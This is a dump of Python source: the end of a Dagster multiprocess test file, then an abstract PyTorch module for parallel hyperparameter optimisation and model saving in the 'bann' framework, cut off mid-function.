interrupt_thread = Thread(target=_send_interrupt_thread, args=(success_tempfile,))
interrupt_thread.start()
results = []
received_interrupt = False
try:
for result in execute_pipeline_iterator(
pipeline=reconstructable(define_sleepy_pipeline),
mode=mode,
run_config=sleepy_run_config,
):
results.append(result.event_type)
except DagsterExecutionInterruptedError:
received_interrupt = True
assert received_interrupt
assert DagsterEventType.STEP_FAILURE in results
assert DagsterEventType.PIPELINE_FAILURE in results
interrupt_thread.join()
def test_multiproc_launcher_requests_retry():
mode = "request_retry"
with tempfile.TemporaryDirectory() as tmpdir:
run_config = make_run_config(tmpdir, mode)
run_config["execution"] = {"multiprocess": {}}
result = execute_pipeline(
instance=DagsterInstance.local_temp(tmpdir),
pipeline=reconstructable(define_basic_pipeline),
mode=mode,
run_config=run_config,
)
assert result.success
assert result.result_for_solid("return_two").output_value() == 2
assert result.result_for_solid("add_one").output_value() == 3
for step_key, events in result.events_by_step_key.items():
if step_key:
event_types = [event.event_type for event in events]
assert DagsterEventType.STEP_UP_FOR_RETRY in event_types
assert DagsterEventType.STEP_RESTARTED in event_types
|
simple_net_abstract.py
|
# -*- coding: utf-8 -*-
""".. moduleauthor:: Artur Lissin"""
import abc
import atexit
import math
import multiprocessing
import queue
import time
from copy import deepcopy
import pickle as rick
from dataclasses import dataclass, field
from datetime import datetime
from enum import Enum
from functools import reduce
from multiprocessing.managers import SharedMemoryManager
from pathlib import Path
from typing import Union, Tuple, Dict, Optional, Iterable, TypeVar, List, Callable, final, \
Final
import numpy as np # type: ignore
from torch import nn
from torch.utils.data import Dataset
from bann.b_container.constants.file_names import TrainSubStrSuf
from bann.b_data_functions.pytorch.p_gen_fun import re_copy_model
from bann.b_test_train_prepare.pytorch.prepare_interface import PrepareInterfaceArgs, \
PrepareInterface
from bann.b_data_functions.pytorch.shared_memory_interface import DataSetSharedMemoryA, SmmConManger
from bann.b_hyper_optim.fun_const_wr.hyper_fun import h_map_dict_to_tuple, h_create_flat_params, \
h_create_hyper_space
from bann.b_container.states.general.net.net_general import NetGeneralState
from bann.b_frameworks.pytorch.pytorch_lego_const import LegoContInit
from bann.b_container.states.general.interface.init_state import InitState
from bann.b_frameworks.pytorch.net_model_interface import InitContainer
from bann.b_container.functions.pytorch.state_string_format import create_hyper_param_str
from bann.b_frameworks.errors.custom_erors import KnownSimpleAnnError
from bann.b_container.functions.pytorch.hyper_framework_fun import create_hyper_arguments, \
update_hyper_params, update_hyper_container
from bann.b_test_train_prepare.pytorch.tester_interface import TesterInterfaceArgs
from bann.b_hyper_optim.hyper_optim_interface import HyperOptimReturnElem, \
HyperOptimInterfaceArgs, HGenTA
from bann.b_test_train_prepare.pytorch.trainer_interface import TrainerInterfaceArgs, \
TrainerInterface
from bann.b_frameworks.pytorch.net_model_interface import NetModelInterface, CurrentNetData
from bann.b_pan_integration.framwork_key_lib import FrameworkKeyLib
from bann.b_container.functions.pytorch.init_framework_fun import InitNetArgs
from pan.public.constants.net_tree_id_constants import ANNTreeIdType
from pan.public.constants.test_net_stats_constants import TestNNStatsElementType
from pan.public.constants.train_net_stats_constants import TrainNNStatsElementType, \
create_train_net_stats_function, TrainNNStatsElemInfo, TrainNNStatsElementFiller, \
TrainReturnFiller
from pan.public.interfaces.pub_net_interface import NodeANNDataElemInterface, NetSavable
from rewowr.public.functions.worker_ctx import get_worker_ctx
from rewowr.public.interfaces.logger_interface import SyncStdoutInterface
from rewowr.public.errors.custom_errors import KnownError
from rewowr.public.functions.decorator_functions import rewowr_process_wrapper, \
ProcessWrapperFun
_FRAMEWORK: Final[str] = FrameworkKeyLib.PYTORCH.value
def get_simple_net_framework() -> str:
return _FRAMEWORK
_ExtraType = TypeVar('_ExtraType')
def _create_hyper_params(args: HyperOptimInterfaceArgs, /) -> Dict[str, HyperOptimReturnElem]:
return {
name: HyperOptimReturnElem(
param=args.hyper_args[name], state_type=args.state_type[name]
)
for name, elem in args.hyper_args.items()
}
_TrFitParam = List[Tuple[float, Dict[str, HyperOptimReturnElem]]]
_TrFitAl = Tuple[_TrFitParam, List[float]]
_TrainArgs = List[Tuple[
TrainerInterfaceArgs, HyperOptimInterfaceArgs, TrainerInterface, PrepareInterface
]]
def _calc_dev(variance: float, space: float, /) -> float:
if not space:
return 0.0
res = variance / space
if res < 1.0:
return res
return 1.0
def _create_deviation_tuple(hyper_param_t: _TrFitAl,
hyper_args: List[HyperOptimInterfaceArgs], /) -> List[float]:
flat_params_l = [
h_create_flat_params(hyper_args_e.hyper_args) for hyper_args_e in hyper_args
]
if len(flat_params_l) <= 1 or sum(elem.sum_el for elem in flat_params_l) <= 1:
return [0.0, 0.0]
space_list = reduce(
lambda num3, num4: list(map(lambda num5, num6: num5 + num6, num3, num4)), (
list(map(
lambda num1, num2: num1 - num2,
h_space.search_space_max, h_space.search_space_min
))
for h_space in (
h_create_hyper_space(
hyper_args_e.hyper_max_args, hyper_args_e.hyper_min_args,
hyper_args_e.min_max_types, flat_params_l[h_index]
)
for h_index, hyper_args_e in enumerate(hyper_args)
)
)
)
flatten_param_list = [
h_map_dict_to_tuple(hyper_param_e[1], flat_params_l[h_index])
for h_index, hyper_param_e in enumerate(hyper_param_t[0])
]
return [
_calc_dev(float(elem), space_list[num1])
for num1, elem in enumerate(
np.std([flatten_p[h_index] for flatten_p in flatten_param_list])
for h_index in range(len(flatten_param_list[0]))
)
]
@final
@dataclass
class _ResQueueEl:
fit_0: float
fit_1: float
in_id: int
state_dict: bytes
@final
@dataclass
class _YieldQueueElWr:
data: TrainNNStatsElementType
def _process_run_fun(index_id: int, prep: PrepareInterface, yield_queue: multiprocessing.Queue,
args: PrepareInterfaceArgs, sync_out: SyncStdoutInterface, /) -> None:
for erg in prep.run_train(sync_out, args):
yield_queue.put(_YieldQueueElWr(erg))
yield_queue.put(_ResQueueEl(
fit_0=prep.fitness[0], fit_1=prep.fitness[1], in_id=index_id,
state_dict=rick.dumps(prep.p_state_dict, protocol=rick.HIGHEST_PROTOCOL)
))
@final
@dataclass
class _ProcessCon:
ctx: multiprocessing.context.SpawnContext
target: ProcessWrapperFun
args: Tuple[
SyncStdoutInterface, str, Callable[..., None],
Tuple[
int, PrepareInterface, multiprocessing.Queue, PrepareInterfaceArgs, SyncStdoutInterface
]
]
def _get_from_queue(sync_out: SyncStdoutInterface, pr_cont: List[_ProcessCon],
yr_queues: multiprocessing.Queue, res_dict: Dict[int, _ResQueueEl],
pr_cnt: int, /) -> Iterable[TrainNNStatsElementType]:
pr_list = []
id_el = 0
while id_el < pr_cnt and not sync_out.error_occurred():
buffer_c = pr_cont[id_el]
pr_list.append(buffer_c.ctx.Process(target=buffer_c.target, args=buffer_c.args))
pr_list[id_el].start()
id_el += 1
max_id = pr_cnt
running = not sync_out.error_occurred()
finished_ids: List[int] = []
while running:
try:
erg_buf = yr_queues.get(True, 2)
except queue.Empty:
started = 0
for id_el in range(max_id):
if not (pr_list[id_el].is_alive() or id_el in finished_ids):
started += 1
finished_ids.append(id_el)
id_el = max_id
new_stop = max_id + started if max_id + started < len(pr_cont) else len(pr_cont)
while id_el < new_stop and not sync_out.error_occurred():
max_id += 1
buffer_c = pr_cont[id_el]
pr_list.append(buffer_c.ctx.Process(target=buffer_c.target, args=buffer_c.args))
pr_list[id_el].start()
id_el += 1
if sync_out.error_occurred():
running = False
else:
running = len(finished_ids) < len(pr_cont) or len(res_dict) < len(pr_cont)
else:
if isinstance(erg_buf, _YieldQueueElWr):
yield erg_buf.data
elif isinstance(erg_buf, _ResQueueEl):
res_dict[erg_buf.in_id] = erg_buf
elif isinstance(erg_buf, KnownError):
raise erg_buf
else:
raise KnownSimpleAnnError(
f"Expected {_ResQueueEl.__name__} or {_YieldQueueElWr.__name__} "
+ f"got {type(erg_buf).__name__}"
)
def _pre_send_empty(data_t: Tuple[Dataset, ...]) -> None:
for data in data_t:
if isinstance(data, DataSetSharedMemoryA):
data.pre_send_empty()
def _optimise_in_parallel(sync_out: SyncStdoutInterface, process_cnt: int,
train_arguments: _TrainArgs,
tr_fit: _TrFitAl, /) -> Iterable[TrainNNStatsElementType]:
ctx = get_worker_ctx()
if not isinstance(ctx, multiprocessing.context.SpawnContext):
raise KnownSimpleAnnError(f"Expected SpawnContext got {type(ctx).__name__}")
yield_queue = ctx.Queue()
for arg_el in train_arguments:
_pre_send_empty(arg_el[0].input_train)
_pre_send_empty(arg_el[0].input_eval)
pr_list: List[_ProcessCon] = [
_ProcessCon(
ctx=ctx,
target=rewowr_process_wrapper,
args=(
sync_out, "OptimTrainStart", _process_run_fun,
(index_id, args[3], yield_queue, PrepareInterfaceArgs(
trainer_args=args[0], trainer=args[2]
), sync_out)
)
)
for index_id, args in enumerate(train_arguments)
]
res_dict: Dict[int, _ResQueueEl] = {}
yield from _get_from_queue(
sync_out, pr_list, yield_queue, res_dict,
process_cnt if 0 < process_cnt < len(pr_list) else len(pr_list)
)
if len(res_dict) != len(pr_list):
raise KnownSimpleAnnError(f"Expected {len(pr_list)} results, got {len(res_dict)}")
for new_id in range(len(pr_list)):
result_el = res_dict.get(new_id, None)
if result_el is None:
raise KnownSimpleAnnError(f"Missing id {new_id}")
tr_fit[0].append((result_el.fit_0, _create_hyper_params(train_arguments[new_id][1])))
tr_fit[1].append(result_el.fit_1)
re_copy_model(rick.loads(result_el.state_dict),
train_arguments[new_id][0].module.get_net_com)
@final
@dataclass
class _SDataCont:
loss: List[float] = field(default_factory=lambda: [])
truth: List[float] = field(default_factory=lambda: [])
best_truth: List[float] = field(default_factory=lambda: [])
best_loss: List[float] = field(default_factory=lambda: [])
best_change: List[float] = field(default_factory=lambda: [])
param_deviation: List[float] = field(default_factory=lambda: [])
run_cnt: int = 0
@final
@dataclass
class _SConstCont:
best_fit: Tuple[float, Dict[str, HyperOptimReturnElem]]
best_truth: float
file_id: ANNTreeIdType
@final
@dataclass
class _TrainNetStatsCon:
hyper_truth: TrainReturnFiller
hyper_loss: TrainReturnFiller
best_changes: TrainReturnFiller
best_truth: TrainReturnFiller
best_loss: TrainReturnFiller
param_deviation: TrainReturnFiller
@final
class _SimpleTrainDataP:
def __init__(self, hyper_cont: HyperOptimInterfaceArgs, id_file: ANNTreeIdType, /) -> None:
super().__init__()
self._train_net_stat_con = _TrainNetStatsCon(
create_train_net_stats_function(), create_train_net_stats_function(),
create_train_net_stats_function(), create_train_net_stats_function(),
create_train_net_stats_function(), create_train_net_stats_function()
)
self._data_cont = _SDataCont()
self._cost_cont = _SConstCont(
file_id=deepcopy(id_file),
best_fit=(float('inf'), _create_hyper_params(hyper_cont)),
best_truth=-3.0
)
self._cost_cont.file_id.add_modifier(TrainSubStrSuf.FITNESS.value)
@property
def bets_fit_h_param(self) -> Tuple[float, Dict[str, HyperOptimReturnElem]]:
return self._cost_cont.best_fit
def update_fitness(self, tr_fit: _TrFitAl, hyper_args: List[HyperOptimInterfaceArgs], /) \
-> None:
loss = []
truth = []
best_truth = []
best_loss = []
best_change = []
param_deviation = 100. * np.mean(_create_deviation_tuple(tr_fit, hyper_args))
param_div_l = []
for param_id, param in enumerate(tr_fit[0]):
if math.isinf(param[0]):
loss.append(-1e-12)
else:
loss.append(param[0])
truth.append(tr_fit[1][param_id])
if param[0] <= self.bets_fit_h_param[0]:
self._cost_cont.best_fit = deepcopy(param)
self._cost_cont.best_truth = tr_fit[1][param_id]
best_change.append(1.0)
else:
best_change.append(0.0)
if math.isinf(self.bets_fit_h_param[0]):
best_loss.append(-1e-12)
else:
best_loss.append(self.bets_fit_h_param[0])
best_truth.append(self._cost_cont.best_truth)
param_div_l.append(param_deviation)
self._data_cont = _SDataCont(
loss=loss,
truth=truth,
best_truth=best_truth,
best_loss=best_loss,
best_change=best_change,
param_deviation=param_div_l,
run_cnt=len(tr_fit[1])
)
def plot(self, last: bool, dump: bool, run_id: int, /) -> Iterable[TrainNNStatsElementType]:
if last and run_id == 0 and self._data_cont.run_cnt > 1:
yield from self._plot_in(
False, dump, run_id, (0, int(self._data_cont.run_cnt / 2))
)
yield from self._plot_in(
True, dump, run_id, (int(self._data_cont.run_cnt / 2), self._data_cont.run_cnt)
)
else:
yield from self._plot_in(last, dump, run_id, (0, self._data_cont.run_cnt))
def _plot_in(self, last: bool, dump: bool, run_id: int,
range_id: Tuple[int, int], /) -> Iterable[TrainNNStatsElementType]:
yield self._train_net_stat_con.hyper_truth(
TrainNNStatsElemInfo(
id_file=self._cost_cont.file_id, name_series="Truth",
type_series='Leg', name_sub_series="Truth", type_sub_series='Sub',
x_label="hyper run",
y_label='Truth/Loss/Change/Dev',
title="hyper optimization", subtitle=""
),
[run_id + param_id for param_id in range(range_id[0], range_id[1])],
self._data_cont.truth[range_id[0]:range_id[1]],
TrainNNStatsElementFiller(
last=last, plot_data=True, dump=dump, write_data=True, hyper_param=""
)
)
yield self._train_net_stat_con.hyper_loss(
TrainNNStatsElemInfo(
id_file=self._cost_cont.file_id, name_series="Loss",
type_series='Leg', name_sub_series="Loss", type_sub_series='Sub',
x_label="hyper run",
y_label='Truth/Loss/Change/Dev',
title="hyper optimization", subtitle=""
),
[run_id + param_id for param_id in range(range_id[0], range_id[1])],
self._data_cont.loss[range_id[0]:range_id[1]],
TrainNNStatsElementFiller(
last=last, dump=dump, hyper_param="", write_data=True, plot_data=True
)
)
yield self._train_net_stat_con.best_truth(
TrainNNStatsElemInfo(
id_file=self._cost_cont.file_id, name_series="TruthBest",
type_series='Leg', name_sub_series="Truth", type_sub_series='Sub',
x_label="hyper run",
y_label='Truth/Loss/Change/Dev',
title="hyper optimization", subtitle=""
),
[run_id + param_id for param_id in range(range_id[0], range_id[1])],
self._data_cont.best_truth[range_id[0]:range_id[1]],
TrainNNStatsElementFiller(
last=last, dump=dump, hyper_param="", write_data=True, plot_data=True
)
)
yield self._train_net_stat_con.best_loss(
TrainNNStatsElemInfo(
id_file=self._cost_cont.file_id, name_series="LossBest",
type_series='Leg', name_sub_series="Loss", type_sub_series='Sub',
x_label="hyper run",
y_label='Truth/Loss/Change/Dev',
title="hyper optimization", subtitle=""
),
[run_id + param_id for param_id in range(range_id[0], range_id[1])],
self._data_cont.best_loss[range_id[0]:range_id[1]],
TrainNNStatsElementFiller(
last=last, dump=dump, hyper_param="", write_data=True, plot_data=True
)
)
yield self._train_net_stat_con.best_changes(
TrainNNStatsElemInfo(
id_file=self._cost_cont.file_id, name_series="BestChange",
type_series='Leg', name_sub_series="Best", type_sub_series='Sub',
x_label="hyper run",
y_label='Truth/Loss/Change/Dev',
title="hyper optimization", subtitle=""
),
[run_id + param_id for param_id in range(range_id[0], range_id[1])],
self._data_cont.best_change[range_id[0]:range_id[1]],
TrainNNStatsElementFiller(
last=last, dump=dump, hyper_param="", write_data=True, plot_data=True
)
)
yield self._train_net_stat_con.param_deviation(
TrainNNStatsElemInfo(
id_file=self._cost_cont.file_id, name_series="ParamDeviation",
type_series='Leg', name_sub_series="Dev", type_sub_series='Sub',
x_label="hyper run",
y_label='Truth/Loss/Change/Dev',
title="hyper optimization", subtitle=""
),
[run_id + param_id for param_id in range(range_id[0], range_id[1])],
self._data_cont.param_deviation[range_id[0]:range_id[1]],
TrainNNStatsElementFiller(
last=last, dump=dump, hyper_param="", write_data=True, plot_data=True
)
)
@final
@dataclass
class _RunningConst:
fit_plotter: _SimpleTrainDataP
hyper_cont_buffer: HyperOptimInterfaceArgs
init_time: float
run_id: int = 0
running: bool = True
smm_con: Optional[SmmConManger] = None
@property
def run_time_min(self) -> int:
return int((time.time() - self.init_time) / 60)
@property
def smm(self) -> Optional[SharedMemoryManager]:
if self.smm_con is None:
return None
return self.smm_con.smm
def shutdown(self) -> None:
if self.smm_con is not None:
self.smm_con.smm_shutdown()
self.smm_con.smm.join()
self.smm_con = None
def start(self) -> None:
if self.smm_con is not None:
self.smm_con.smm_start()
def init(self) -> None:
if self.smm_con is None:
self.smm_con = SmmConManger()
_TypeBuffer = TypeVar('_TypeBuffer')
class SimpleNetCon(NetModelInterface[_TypeBuffer], abc.ABC):
def __init__(self) -> None:
super().__init__()
self.__current_net: Union[Tuple[float, Dict, Dict], CurrentNetData] = \
self._create_current_net()
self.__buffered_best_net: Optional[CurrentNetData] = deepcopy(self.__current_net)
self.__init_blank_net: Optional[CurrentNetData] = deepcopy(self.__current_net)
@property
@abc.abstractmethod
def lego_init_cont(self) -> LegoContInit:
raise NotImplementedError("Abstract method!")
@abc.abstractmethod
def _create_current_net(self) -> CurrentNetData:
raise NotImplementedError("Abstract method!")
@abc.abstractmethod
def _create_current_loaded_net(self, extra_args: InitContainer, /) -> CurrentNetData:
raise NotImplementedError("Abstract method!")
@final
@property
def current_net(self) -> Union[CurrentNetData, Tuple[float, Dict, Dict]]:
return self.__current_net
@final
@property
def buffered_best_net(self) -> CurrentNetData:
if self.__buffered_best_net is None:
raise KnownSimpleAnnError("The net was not appropriately loaded!")
return self.__buffered_best_net
@final
@property
def init_blank_net(self) -> CurrentNetData:
if self.__init_blank_net is None:
raise KnownSimpleAnnError("The net was not appropriately loaded!")
return self.__init_blank_net
@abc.abstractmethod
def remove_before_save(self) -> _TypeBuffer:
raise NotImplementedError("Abstract method!")
@abc.abstractmethod
def reload_after_save(self, data: _TypeBuffer, /) -> None:
raise NotImplementedError("Abstract method!")
# ----------------------------------------------------------------------------------------------
@final
def redraw_current_net(self) -> None:
if not isinstance(self.current_net, CurrentNetData):
raise KnownSimpleAnnError(f"SimpleNetCon is not in {CurrentNetData.__name__} mode")
self.__current_net = self._create_current_net()
@final
def merge_net_model(self, model: NetModelInterface, /) -> None:
if not isinstance(model, SimpleNetCon):
raise KnownSimpleAnnError(
f"Expected {SimpleNetCon.__name__} got {type(model).__name__}"
)
self.__current_net = deepcopy(model.current_net)
@final
def re_copy_current_net(self) -> None:
if not isinstance(self.current_net, CurrentNetData):
raise KnownSimpleAnnError(f"SimpleNetCon is not in {CurrentNetData.__name__} mode")
self.__buffered_best_net = deepcopy(self.current_net)
self.__init_blank_net = deepcopy(self.current_net)
@final
def re_init_current_net(self, new_net: CurrentNetData, /) -> None:
if not isinstance(self.current_net, CurrentNetData):
raise KnownSimpleAnnError(f"SimpleNetCon is not in {CurrentNetData.__name__} mode")
self.__current_net = deepcopy(new_net)
self.__buffered_best_net = deepcopy(new_net)
self.__init_blank_net = deepcopy(new_net)
@final
def update_current_net(self, fitness: float, /) -> None:
if not isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
old_fitness = self.buffered_best_net.fitness
self.__current_net.fitness = fitness
if fitness <= old_fitness:
self.__buffered_best_net = deepcopy(self.__current_net)
@final
def reset_current_net(self) -> None:
if not isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
self.__current_net = deepcopy(self.init_blank_net)
@final
def set_best_net(self) -> None:
if not isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
self.__current_net = deepcopy(self.buffered_best_net)
@final
@property
def get_net_com(self) -> nn.Module:
if not isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
return self.__current_net.com
@final
@property
def get_net_lego(self) -> nn.Module:
if not isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
return self.__current_net.lego
@final
def save(self) -> Tuple[
bytes, Tuple[CurrentNetData, CurrentNetData, CurrentNetData], _TypeBuffer
]:
cr_net = self.current_net
if not isinstance(cr_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
buf_net = self.buffered_best_net
self.__current_net = (buf_net.fitness, buf_net.com.state_dict(), buf_net.lego.state_dict())
init_net = self.init_blank_net
self.__buffered_best_net = None
self.__init_blank_net = None
rem_buf = self.remove_before_save()
erg = (
rick.dumps(self, protocol=rick.HIGHEST_PROTOCOL),
(cr_net, buf_net, init_net), rem_buf
)
return erg
@final
def save_complete(self, saved_net: Tuple[CurrentNetData, ...],
saved_buf: _TypeBuffer, /) -> None:
if isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately saved!")
if len(saved_net) != 3:
raise KnownSimpleAnnError(f"Expected saved_net tuple length 3 got {len(saved_net)}!")
for elem in saved_net:
if not isinstance(elem, CurrentNetData):
raise KnownSimpleAnnError(f"Expected CurrentNetData got {type(elem).__name__}!")
self.__current_net = saved_net[0]
self.__buffered_best_net = saved_net[1]
self.__init_blank_net = saved_net[2]
self.reload_after_save(saved_buf)
@final
def load_tuple_dict_stats(self, data: Tuple[float, Dict, Dict],
extra_args: InitContainer, /) -> None:
self.__current_net = self._create_current_loaded_net(extra_args)
self.__current_net.fitness = data[0]
self.__current_net.com.load_state_dict(data[1])
self.__current_net.com.eval()
self.__current_net.lego.load_state_dict(data[2])
self.__current_net.lego.eval()
self.__buffered_best_net = deepcopy(self.__current_net)
self.__init_blank_net = deepcopy(self.__current_net)
@classmethod
@final
def load(cls, data: bytes, extra_args: InitContainer, /) -> 'SimpleNetCon':
if not isinstance(extra_args, InitContainer):
raise KnownSimpleAnnError(
f"Expected args to be {InitContainer.__name__} got {type(extra_args).__name__}!"
)
loaded_net = rick.loads(data)
if not isinstance(loaded_net, SimpleNetCon):
raise KnownSimpleAnnError(
f"Expected bytes to be {SimpleNetCon.__name__} got {type(loaded_net).__name__}!"
)
loaded_tuple = loaded_net.current_net
if not isinstance(loaded_tuple, tuple):
raise KnownSimpleAnnError(
f"Expected tuple got {type(loaded_tuple).__name__}!"
)
if len(loaded_tuple) != 3:
raise KnownSimpleAnnError(
f"Expected tuple to have 3 elements got {len(loaded_tuple)}!"
)
if not (isinstance(loaded_tuple[0], float)
and isinstance(loaded_tuple[1], dict)
and isinstance(loaded_tuple[2], dict)):
raise KnownSimpleAnnError("Received wrong typed tuple!")
casted_tuple = (
float(loaded_tuple[0]),
{**loaded_tuple[1]},
{**loaded_tuple[2]}
)
loaded_net.load_tuple_dict_stats(casted_tuple, extra_args)
return loaded_net
@final
@dataclass
class _SimpleANNCon:
test_data: Optional[Tuple[Dataset, ...]] = None
train_data: Optional[Tuple[Dataset, ...]] = None
eval_data: Optional[Tuple[Dataset, ...]] = None
stop_op_fp: Optional[Path] = None
is_trainable: Tuple[bool, bool] = (True, False)
def _unlink_if_exists(file_p: Path, /) -> None:
if file_p.exists() and file_p.is_file():
file_p.unlink()
@final
class DataSetTypes(Enum):
TRAIN = 'TrainData'
TEST = 'TestData'
EVAL = 'EvalData'
def _move_data_to_shared_mem(data_t: Optional[Tuple[Dataset, ...]],
smm: SharedMemoryManager, /) -> None:
if data_t is not None:
for data in data_t:
if isinstance(data, DataSetSharedMemoryA):
data.move_data_to_shared_memory(smm)
class SimpleAnnNet(
NodeANNDataElemInterface[nn.Module, CurrentNetData, _TypeBuffer, InitContainer],
abc.ABC
):
def __init__(self, args: InitNetArgs, /) -> None:
super().__init__()
self.__arguments_con = args
self.__data_container = _SimpleANNCon()
self.__savable: Optional[
NetSavable[nn.Module, CurrentNetData, _TypeBuffer, InitContainer]
] = None
self.__net_module: Optional[SimpleNetCon] = None
self.__data_name = "NotSet"
@final
def get_node_name(self) -> str:
return self.__data_name
@final
def set_node_name(self, name: str) -> None:
self.__data_name = name
@final
def _move_data_sets_to_shared_memory(self, smm: Optional[SharedMemoryManager], /) -> None:
if smm is not None:
_move_data_to_shared_mem(self.__data_container.train_data, smm)
_move_data_to_shared_mem(self.__data_container.eval_data, smm)
@abc.abstractmethod
def re_read_data(self, data_type: DataSetTypes, /) -> Optional[Tuple[Dataset, ...]]:
raise NotImplementedError("Abstract method!")
@abc.abstractmethod
def check_net_state(self) -> NetGeneralState:
raise NotImplementedError("Abstract method!")
@abc.abstractmethod
def check_init_state(self) -> InitState:
raise NotImplementedError("Abstract method!")
@abc.abstractmethod
def get_truth_fun_id(self) -> str:
raise NotImplementedError("Abstract method!")
@final
def stop_file_it_min(self, it_cnt: int, runt_time_min: int, /) -> bool:
return (
it_cnt < self.arguments_con.hyper_optim_wr.stop_iterations
or not self.arguments_con.hyper_optim_wr.stop_iterations
) and (
self.stop_file is None
or (self.stop_file.exists() and self.stop_file.is_file())
) and (
runt_time_min < self.arguments_con.hyper_optim_wr.stop_time_min
or not self.arguments_con.hyper_optim_wr.stop_time_min
)
@final
@property
def stop_file(self) -> Optional[Path]:
return self.__data_container.stop_op_fp
@final
def stop_file_set(self, file_p: Optional[Path], /) -> None:
if file_p is not None and file_p.exists() and file_p.is_file():
self.__data_container.stop_op_fp = file_p
@final
@property
def arguments_con(self) -> InitNetArgs:
return self.__arguments_con
@final
def is_trainable(self) -> bool:
return self.retrain and not self.random_net
@final
@property
def retrain(self) -> bool:
return self.__data_container.is_trainable[0]
@final
def retrain_set(self, retrain: bool, /) -> None:
self.__data_container.is_trainable = (retrain, self.__data_container.is_trainable[1])
@final
@property
def random_net(self) -> bool:
return self.__data_container.is_trainable[1]
@final
def random_net_set(self, random_net: bool, /) -> None:
self.__data_container.is_trainable = (self.__data_container.is_trainable[0], random_net)
@final
@property
def test_data(self) -> Tuple[Dataset, ...]:
if self.__data_container.test_data is None:
return ()
temp_data = self.re_read_data(DataSetTypes.TEST)
if temp_data is not None:
self.test_data_set(temp_data)
return self.__data_container.test_data
@final
def test_data_set(self, data: Tuple[Dataset, ...], /) -> None:
if not (isinstance(data, tuple) and data):
raise KnownSimpleAnnError("The given test data set was empty")
self.__data_container.test_data = data
@final
@property
def train_data(self) -> Tuple[Dataset, ...]:
if self.__data_container.train_data is None:
return ()
temp_data = self.re_read_data(DataSetTypes.TRAIN)
if temp_data is not None:
self.train_data_set(temp_data)
return self.__data_container.train_data
@final
def train_data_set(self, data: Tuple[Dataset, ...], /) -> None:
if not (isinstance(data, tuple) and data):
raise KnownSimpleAnnError("The given train data set was empty")
self.__data_container.train_data = data
@final
@property
def eval_data(self) -> Tuple[Dataset, ...]:
if self.__data_container.eval_data is None:
return ()
temp_data = self.re_read_data(DataSetTypes.EVAL)
if temp_data is not None:
self.eval_data_set(temp_data)
return self.__data_container.eval_data
@final
def eval_data_set(self, data: Tuple[Dataset, ...], /) -> None:
if not (isinstance(data, tuple) and data):
raise KnownSimpleAnnError("The given eval data set was empty")
self.__data_container.eval_data = data
@final
@property
def savable(self) -> \
Optional[NetSavable[nn.Module, CurrentNetData, _TypeBuffer, InitContainer]]:
return self.__savable
@final
def savable_set(self, savable: NetSavable[
nn.Module, CurrentNetData, _TypeBuffer, InitContainer
], /) -> None:
self.__savable = savable
@final
def get_savable_data(self) -> NetSavable[nn.Module, CurrentNetData, _TypeBuffer, InitContainer]:
if self.__savable is None:
raise KnownSimpleAnnError("Net was not initialised!")
return self.__savable
@final
@property
def net_module(self) -> Optional[SimpleNetCon]:
return self.__net_module
@final
def net_module_set(self, module: SimpleNetCon, /) -> None:
if self.__net_module is not None:
raise KnownSimpleAnnError("Net was already initialised!")
self.__net_module = module
@final
def get_savable_net(self) -> SimpleNetCon:
if self.__net_module is None:
raise KnownSimpleAnnError("Net was not initialised!")
return self.__net_module
@final
def _update_hyper_run(self, hyper_cont: HyperOptimInterfaceArgs,
new_params: Dict[str, HyperOptimReturnElem], /) -> None:
self.get_savable_net().reset_current_net()
self._update_hyper(hyper_cont, new_params)
@final
def _update_hyper(self, hyper_cont: HyperOptimInterfaceArgs,
new_params: Dict[str, HyperOptimReturnElem], /) -> None:
update_hyper_params(self.get_savable_net(), self.arguments_con, new_params)
update_hyper_container(self.arguments_con, hyper_cont)
@final
def _create_train_interface(self, id_file: ANNTreeIdType,
copy: bool, id_mod: str, /) -> TrainerInterfaceArgs:
if self.arguments_con.net_state.get_kwargs().redraw:
self.get_savable_net().redraw_current_net()
if copy:
buf = self.get_savable_net().remove_before_save()
new_mod = deepcopy(self.get_savable_net())
self.get_savable_net().reload_after_save(buf)
else:
new_mod = self.get_savable_net()
new_train_args = TrainerInterfaceArgs(
module=new_mod,
input_train=self.train_data,
input_eval=self.eval_data,
id_file=deepcopy(id_file),
dump=self.arguments_con.net_state.get_kwargs().dump,
cuda=self.arguments_con.net_state.get_kwargs().cuda,
optimizer=deepcopy(self.arguments_con.optimizer_wr)
if copy else self.arguments_con.optimizer_wr,
scheduler=deepcopy(self.arguments_con.scheduler_wr)
if copy else self.arguments_con.scheduler_wr,
criterion=deepcopy(self.arguments_con.criterion_wr)
if copy else self.arguments_con.criterion_wr,
truth_fun_id=self.get_truth_fun_id(),
hyper_str=create_hyper_param_str(self.get_node_name(), self.arguments_con)
)
if id_mod:
new_train_args.id_file.add_modifier(id_mod)
return new_train_args
@final
def _create_stop_file(self, id_file: ANNTreeIdType, /) -> Optional[Path]:
if self.arguments_con.hyper_optim_wr is not None \
and self.arguments_con.hyper_optim_wr.stop_file is not None \
and self.arguments_con.hyper_optim_wr.stop_file.exists() \
and self.arguments_con.hyper_optim_wr.stop_file.is_dir():
merged_str = \
f"{id_file.id_merged_str}_{datetime.now().strftime('%d_%m_%Y__%H_%M_%S')}.lock"
stop_file = self.arguments_con.hyper_optim_wr.stop_file.joinpath(merged_str)
stop_file.touch()
atexit.register(_unlink_if_exists, stop_file)
return stop_file
return None
def _get_new_params(self, generator_optim: HGenTA, fixed_params: _TrFitParam,
run_cont: _RunningConst, /) -> List[Dict[str, HyperOptimReturnElem]]:
run_cnt = 0
l_new_params: List[Dict[str, HyperOptimReturnElem]] = []
while run_cnt < 10 and not l_new_params:
run_cnt += 1
try:
l_new_params = generator_optim.send(fixed_params)
except StopIteration:
run_cont.running = False
run_cnt = 10
else:
run_cont.running = self.stop_file_it_min(run_cont.run_id, run_cont.run_time_min)
if not l_new_params:
run_cont.running = False
return l_new_params
def _train_single(self, sync_out: SyncStdoutInterface, run_cont: _RunningConst,
hyper_cont: HyperOptimInterfaceArgs,
